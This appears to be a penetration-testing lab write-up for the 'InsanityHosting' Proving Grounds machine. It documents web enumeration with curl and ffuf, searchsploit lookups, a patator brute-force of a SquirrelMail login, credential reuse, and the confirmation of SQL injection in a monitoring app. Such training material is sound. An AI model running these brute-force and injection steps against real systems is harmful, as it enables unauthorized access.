Web
Nmap discovered a Web server on the port 80 of the 192.168.207.124 host.
The running service is Apache httpd 2.4.6 ((CentOS) PHP/7.2.33)
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/insanityhosting]
└─$ curl -I -X OPTIONS http://$IP/
HTTP/1.1 200 OK
Date: Thu, 03 Jul 2025 19:13:05 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.2.33
Allow: GET,HEAD,POST,OPTIONS,TRACE
Content-Length: 0
Content-Type: text/html; charset=UTF-8
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/insanityhosting]
└─$ curl -I http://$IP/
HTTP/1.1 200 OK
Date: Thu, 03 Jul 2025 19:13:07 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.2.33
Last-Modified: Sun, 16 Aug 2020 14:23:16 GMT
ETag: "56f7-5acff65168875"
Accept-Ranges: bytes
Content-Length: 22263
Content-Type: text/html; charset=UTF-8/Play/InsanityHosting/2-Enumeration/attachments/{29D7887B-BE38-4737-8A22-8684F38E5D96}.png)
Webroot
It’s a static site.
Domain
/Play/InsanityHosting/2-Enumeration/attachments/{3E76E4EB-D6EC-4786-BFEF-F63BECAE3274}.png)
A domain disclosure; insanityhosting.vm
/Play/InsanityHosting/2-Enumeration/attachments/{4F35093F-4061-4557-BACD-5C33EC170566}.png)
The domain information has been appended to the /etc/hosts file on Kali for local DNS resolution.
Fuzzing
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/insanityhosting]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://$IP/FUZZ -ic -e .html,.txt,.php
________________________________________________
:: Method : GET
:: URL : http://192.168.207.124/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
:: Extensions : .html .txt .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
.htaccess.html [Status: 403, Size: 216, Words: 15, Lines: 9, Duration: 21ms]
.htaccess.txt [Status: 403, Size: 215, Words: 15, Lines: 9, Duration: 21ms]
.htaccess [Status: 403, Size: 211, Words: 15, Lines: 9, Duration: 21ms]
.htpasswd.txt [Status: 403, Size: 215, Words: 15, Lines: 9, Duration: 19ms]
.htaccess.php [Status: 403, Size: 215, Words: 15, Lines: 9, Duration: 19ms]
.htpasswd.php [Status: 403, Size: 215, Words: 15, Lines: 9, Duration: 19ms]
.htpasswd.html [Status: 403, Size: 216, Words: 15, Lines: 9, Duration: 21ms]
.htpasswd [Status: 403, Size: 211, Words: 15, Lines: 9, Duration: 21ms]
cgi-bin/ [Status: 403, Size: 210, Words: 15, Lines: 9, Duration: 19ms]
cgi-bin/.html [Status: 403, Size: 215, Words: 15, Lines: 9, Duration: 21ms]
css [Status: 301, Size: 235, Words: 14, Lines: 8, Duration: 24ms]
data [Status: 301, Size: 236, Words: 14, Lines: 8, Duration: 20ms]
fonts [Status: 301, Size: 237, Words: 14, Lines: 8, Duration: 20ms]
img [Status: 301, Size: 235, Words: 14, Lines: 8, Duration: 19ms]
index.php [Status: 200, Size: 31, Words: 4, Lines: 1, Duration: 25ms]
index.html [Status: 200, Size: 22263, Words: 8919, Lines: 480, Duration: 21ms]
js [Status: 301, Size: 234, Words: 14, Lines: 8, Duration: 22ms]
licence [Status: 200, Size: 57, Words: 10, Lines: 2, Duration: 22ms]
monitoring [Status: 301, Size: 242, Words: 14, Lines: 8, Duration: 22ms]
news [Status: 301, Size: 236, Words: 14, Lines: 8, Duration: 21ms]
phpmyadmin [Status: 301, Size: 242, Words: 14, Lines: 8, Duration: 22ms]
phpinfo.php [Status: 200, Size: 85342, Words: 4351, Lines: 1024, Duration: 29ms]
webmail [Status: 301, Size: 239, Words: 14, Lines: 8, Duration: 19ms]
:: Progress: [81912/81912] :: Job [1/1] :: 1960 req/sec :: Duration: [0:00:45] :: Errors: 0 ::
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/insanityhosting]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://$IP/FUZZ/ -ic
________________________________________________
:: Method : GET
:: URL : http://192.168.207.124/FUZZ/
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
[Status: 200, Size: 22263, Words: 8919, Lines: 480, Duration: 4421ms]
icons [Status: 200, Size: 74409, Words: 7427, Lines: 1007, Duration: 42ms]
data [Status: 200, Size: 1091, Words: 117, Lines: 17, Duration: 21ms]
css [Status: 200, Size: 2397, Words: 202, Lines: 23, Duration: 24ms]
news [Status: 200, Size: 5111, Words: 362, Lines: 136, Duration: 2409ms]
js [Status: 200, Size: 4225, Words: 338, Lines: 31, Duration: 20ms]
cgi-bin [Status: 403, Size: 210, Words: 15, Lines: 9, Duration: 3415ms]
webmail [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 24ms]
img [Status: 200, Size: 1091, Words: 107, Lines: 17, Duration: 4423ms]
fonts [Status: 200, Size: 2915, Words: 205, Lines: 25, Duration: 19ms]
monitoring [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 37ms]
phpmyadmin [Status: 200, Size: 15373, Words: 2711, Lines: 322, Duration: 243ms]
:: Progress: [207630/207630] :: Job [1/1] :: 2061 req/sec :: Duration: [0:01:55] :: Errors: 0 ::- /index.php
- /phpinfo.php
- /data/
- /news/
- /webmail/
- /monitoring/
- /phpmyadmin/
/index.php
/Play/InsanityHosting/2-Enumeration/attachments/{C40C3C7D-2A44-4C11-8351-0F099D4ACE7A}-1.png)
Missing version directory?
/phpinfo.php
/Play/InsanityHosting/2-Enumeration/attachments/{819294C0-301A-4D04-9722-27159F5FCC2D}.png)
PHP Version 7.2.33
/Play/InsanityHosting/2-Enumeration/attachments/Pasted-image-20250703213440.png)
insanityhosting.vm is the server name.
Web root directory at /var/www/html
/Play/InsanityHosting/2-Enumeration/attachments/{0A081342-0CA1-4875-8546-50DB3D13284B}.png)
MySQL in the backend.
/Play/InsanityHosting/2-Enumeration/attachments/{AB01E64B-D94D-4B6F-99E8-E115509C1A35}.png)
.phar supported
/data/ Endpoint
/Play/InsanityHosting/2-Enumeration/attachments/{A29AB9B0-B33E-41BE-8217-2462D6FBA23E}.png)
2 files;
EMPTY
/Play/InsanityHosting/2-Enumeration/attachments/{69D6F940-0FC6-411E-8E50-C96BBDFB7FB2}.png)
1.14.0
VERSION
/Play/InsanityHosting/2-Enumeration/attachments/{F6BAC535-5E4B-4655-ABAC-CF89B7769C25}.png)
1.14.0
/news/ Endpoint
/Play/InsanityHosting/2-Enumeration/attachments/{E8893F9B-5E7C-4C96-A874-529A9C767A1D}.png)
A Bludit instance at the /news/ endpoint.
/Play/InsanityHosting/2-Enumeration/attachments/Pasted-image-20250703214022.png)
Bludit is a web application to build your own website or blog in seconds, it’s completely free and open source. Markdown support.
Bludit Username Disclosure
/Play/InsanityHosting/2-Enumeration/attachments/{17D09136-B9D0-47D9-A3E0-C1A1D54DFB66}.png)
Potential username disclosure; Otis
Bludit Version Information
/Play/InsanityHosting/2-Enumeration/attachments/{5368AECE-ABDC-475B-B2AB-CCD9EEAE2A2F}.png)
The version information is disclosed at the bl-plugins/about/metadata.json endpoint; 3.13.1
Bludit Vulnerabilities
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/insanityhosting]
└─$ searchsploit Bludit 3.13.1
------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------ ---------------------------------
Bludit 3.13.1 - 'username' Cross Site Scripting (XSS) | php/webapps/50529.txt
Bludit < 3.13.1 Backup Plugin - Arbitrary File Download (Authenticated) | php/webapps/51541.py
------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No ResultsBludit 3.13.1 suffers from multiple vulnerabilities.
Bludit Admin Panel
/Play/InsanityHosting/2-Enumeration/attachments/{426B2EF8-06DB-415F-8E2F-BD5541C5C1BD}.png)
Admin panel is available at the /admin/ endpoint.
No credential is known at this time.
/webmail/ Endpoint
/Play/InsanityHosting/2-Enumeration/attachments/{479DDBCE-5D31-4A51-A9DB-3A1DD18F8949}.png)
A login page for a SquirrelMail instance at the /webmail Endpoint
No credential is known at this time.
/Play/InsanityHosting/2-Enumeration/attachments/Pasted-image-20250703213027.png)
SquirrelMail is a project that aims to provide both a web-based email client and a proxy server for the IMAP protocol.
SquirrelMail configtest
/Play/InsanityHosting/2-Enumeration/attachments/{9EC4CDFD-986F-4BCE-B662-925F65EE32DB}.png)
N/A
SquirrelMail Brute-Force Attack
A potential user has been identified above; Otis
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/insanityhosting]
└─$ patator http_fuzz proxy=localhost:8080 url=http://insanityhosting.vm/webmail/src/redirect.php method=POST body="login_username=Otis&secretkey=FILE0" 0=/usr/share/wordlists/john.lst follow=0 accept_cookie=1 -x ignore:fgrep='Unknown user or password incorrect.'
23:05:03 patator INFO - Starting Patator 1.0 (https://github.com/lanjelot/patator) with python-3.13.3 at 2025-07-03 23:05 CEST
23:05:03 patator INFO -
23:05:03 patator INFO - code size:clen time | candidate | num | mesg
23:05:03 patator INFO - -----------------------------------------------------------------------------
23:05:35 patator INFO - 302 2046:0 15.150 | 123456 | 14 | HTTP/1.1 302 Found
23:10:40 patator INFO - Hits/Done/Skip/Fail/Size: 1/3559/0/0/3559, Avg: 14 r/s, Time: 0h 5m 37sFound a password for the Otis user; 123456
SquirrelMail Authentication
/Play/InsanityHosting/2-Enumeration/attachments/{F95EBC3C-6D2C-49C8-BCAC-2D71B8ECCF72}.png)
/Play/InsanityHosting/2-Enumeration/attachments/{4F9857FA-872E-4003-B780-90ED4FC06664}.png)
Successfully authenticated as the Otis user to the target SquirrelMail instance.
SquirrelMail Version Information
/Play/InsanityHosting/2-Enumeration/attachments/{3F53CEE3-BC8B-41C9-A23A-8B0DBE242E5C}.png)
Version information is disclosed; 1.4.22
SquirrelMail Vulnerabilities
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/insanityhosting]
└─$ searchsploit SquirrelMail 1.4.22
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
SquirrelMail < 1.4.22 - Remote Code Execution | linux/remote/41910.sh
---------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No ResultsSquirrelMail 1.4.22 suffers from a RCE vulnerability; CVE-2017-7692 # This did not work.
Authentication has been made through the brute-force attack.
/monitoring/ Endpoint
/Play/InsanityHosting/2-Enumeration/attachments/{9063AFF9-D86E-40CE-B7D9-B8246F15A88D}.png)
Redirected to a custom PHP application at the /monitoring/ endpoint.
No credential is known at this time.
Authentication
/Play/InsanityHosting/2-Enumeration/attachments/{9F6213C7-8A09-40AA-B91F-9C9D9BD8AD33}.png)
Attempting to authenticate using the same credential for the target SquirrelMail instance; Otis:123456
/Play/InsanityHosting/2-Enumeration/attachments/{D113EE84-57F9-467A-8A36-5AC5BCE8668E}.png)
Successfully authenticated
MONITORING CONTROL
Adding A New Monitoring Instance
/Play/InsanityHosting/2-Enumeration/attachments/{1CDE55FD-662F-492E-A456-B0634C5A4825}.png)
/Play/InsanityHosting/2-Enumeration/attachments/{8E95A729-CEF6-476C-B19A-BCB31D7EA7AF}.png)
Adding a new instance for monitoring.
/Play/InsanityHosting/2-Enumeration/attachments/Pasted-image-20250703234421.png)
A new instance has been added but the Status field shows empty.
/Play/InsanityHosting/2-Enumeration/attachments/{4FEE5CC1-ED64-494A-98AB-234E9BBEB5E3}-1.png)
and nothing on the responder
/Play/InsanityHosting/2-Enumeration/attachments/{3616D37A-17C9-481D-9479-FB65A8BFF552}.png)
The target system pinged Kali.
/Play/InsanityHosting/2-Enumeration/attachments/{6A38EE5C-6136-4538-A522-6EEE34DB6DEF}.png)
The Status field now shows UP
Server Is Down
/Play/InsanityHosting/2-Enumeration/attachments/{06D8D2ED-478C-4C64-9BF8-775CB17CBCB2}.png)
It says that, if a server is down, e-mail will be sent with a report
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/insanityhosting]
└─$ sudo iptables -A INPUT -p icmp -j DROPI will make Kali block all the ICMP traffic and observe the inbox on the target SquirrelMail instance.
/Play/InsanityHosting/2-Enumeration/attachments/{D840AC68-D1A4-4A3F-8D36-1BF062D545AA}.png)
A mail came through from monitor@localhost.localdomain
/Play/InsanityHosting/2-Enumeration/attachments/{286AA9B1-72A3-4CA2-9FD2-E11EEC67101C}.png)
The mail indeed contains a report that appears to be fetched from a database.
Name field is reflected; test
SQLi
/Play/InsanityHosting/2-Enumeration/attachments/{C70F7046-141F-4174-8834-2C4D5D12156C}.png)
Injecting a SQLi testing payload into the Name field.
/Play/InsanityHosting/2-Enumeration/attachments/{DAED7820-9E30-4DD0-81AB-38E3408FE6AA}.png)
It failed because it’s wrapped in double quotes (")
/Play/InsanityHosting/2-Enumeration/attachments/{6B06EC94-6558-4537-90FD-AAFA7ED8CD99}.png)
Testing it again with a double quote (")
/Play/InsanityHosting/2-Enumeration/attachments/{CB464D72-D523-47A8-AB06-A34A41CC74C7}.png)
SQLi confirmed as it listed every single entry.
Fuzzing /monitoring/ Endpoint
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/insanityhosting]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://insanityhosting.vm/monitoring/FUZZ -ic -e .html,.txt,.php
________________________________________________
:: Method : GET
:: URL : http://insanityhosting.vm/monitoring/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
:: Extensions : .html .txt .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
.htpasswd.html [Status: 403, Size: 227, Words: 15, Lines: 9, Duration: 19ms]
.htaccess [Status: 403, Size: 222, Words: 15, Lines: 9, Duration: 21ms]
.htaccess.txt [Status: 403, Size: 226, Words: 15, Lines: 9, Duration: 21ms]
.htpasswd.php [Status: 403, Size: 226, Words: 15, Lines: 9, Duration: 21ms]
.htaccess.php [Status: 403, Size: 226, Words: 15, Lines: 9, Duration: 21ms]
.htpasswd [Status: 403, Size: 222, Words: 15, Lines: 9, Duration: 21ms]
.htpasswd.txt [Status: 403, Size: 226, Words: 15, Lines: 9, Duration: 21ms]
.htaccess.html [Status: 403, Size: 227, Words: 15, Lines: 9, Duration: 21ms]
assets [Status: 301, Size: 252, Words: 14, Lines: 8, Duration: 20ms]
class [Status: 301, Size: 251, Words: 14, Lines: 8, Duration: 19ms]
cron.php [Status: 403, Size: 221, Words: 15, Lines: 9, Duration: 21ms]
css [Status: 301, Size: 249, Words: 14, Lines: 8, Duration: 19ms]
fonts [Status: 301, Size: 251, Words: 14, Lines: 8, Duration: 20ms]
images [Status: 301, Size: 252, Words: 14, Lines: 8, Duration: 20ms]
index.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 24ms]
js [Status: 301, Size: 248, Words: 14, Lines: 8, Duration: 19ms]
login.php [Status: 200, Size: 4848, Words: 110, Lines: 96, Duration: 21ms]
logout.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 25ms]
settings [Status: 301, Size: 254, Words: 14, Lines: 8, Duration: 21ms]
smarty [Status: 301, Size: 252, Words: 14, Lines: 8, Duration: 19ms]
templates [Status: 301, Size: 255, Words: 14, Lines: 8, Duration: 22ms]
templates_c [Status: 301, Size: 257, Words: 14, Lines: 8, Duration: 24ms]
vendor [Status: 301, Size: 252, Words: 14, Lines: 8, Duration: 21ms]
:: Progress: [81912/81912] :: Job [1/1] :: 1818 req/sec :: Duration: [0:00:47] :: Errors: 0 ::
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/insanityhosting]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://insanityhosting.vm/monitoring/FUZZ/ -ic -fw 1
________________________________________________
:: Method : GET
:: URL : http://insanityhosting.vm/monitoring/FUZZ/
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 1
________________________________________________
images [Status: 200, Size: 1129, Words: 105, Lines: 17, Duration: 64ms]
templates [Status: 200, Size: 1573, Words: 150, Lines: 19, Duration: 23ms]
assets [Status: 200, Size: 1953, Words: 236, Lines: 21, Duration: 23ms]
css [Status: 200, Size: 1120, Words: 103, Lines: 17, Duration: 19ms]
js [Status: 200, Size: 911, Words: 81, Lines: 16, Duration: 21ms]
vendor [Status: 200, Size: 2642, Words: 261, Lines: 24, Duration: 23ms]
settings [Status: 200, Size: 923, Words: 76, Lines: 16, Duration: 22ms]
class [Status: 200, Size: 1337, Words: 121, Lines: 18, Duration: 19ms]
fonts [Status: 200, Size: 1583, Words: 132, Lines: 19, Duration: 31ms]
smarty [Status: 200, Size: 2211, Words: 200, Lines: 22, Duration: 24ms]
templates_c [Status: 200, Size: 1785, Words: 89, Lines: 19, Duration: 21ms]
:: Progress: [207630/207630] :: Job [1/1] :: 1652 req/sec :: Duration: [0:01:52] :: Errors: 0 ::N/A
/phpmyadmin/ Endpoint
/Play/InsanityHosting/2-Enumeration/attachments/{65931E6C-44FF-49C7-8B0D-9CB13B56FFA4}.png)
A phpMyAdmin instance at the /phpmyadmin/ endpoint.
No credential is known at this time.
Virtual Host / Sub-domain Discovery
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/insanityhosting]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://$IP/ -H 'Host: FUZZ.insanityhosting.vm' -ic -mc all -fs 22263
________________________________________________
:: Method : GET
:: URL : http://192.168.207.124/
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.insanityhosting.vm
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
:: Filter : Response size: 22263
________________________________________________
gc._msdcs [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 20ms]
_domainkey [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 23ms]
mailing._domainkey.sunnynews [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 20ms]
mailing._domainkey.info [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 23ms]
hallam_dev [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 21ms]
hallam_ad [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 20ms]
wm_j_b__ruffin [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 20ms]
2609_n_www [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 22ms]
0907_n_hn.m [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 24ms]
0507_n_hn [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 22ms]
faitspare_mbp.cit [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 25ms]
sb_0601388345bc6cd8 [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 23ms]
sb_0601388345bc450b [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 22ms]
api_portal_dev [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 22ms]
api_web_dev [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 25ms]
api_webi_dev [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 22ms]
sklep_test [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 22ms]
:: Progress: [114438/114438] :: Job [1/1] :: 900 req/sec :: Duration: [0:01:53] :: Errors: 0 ::N/A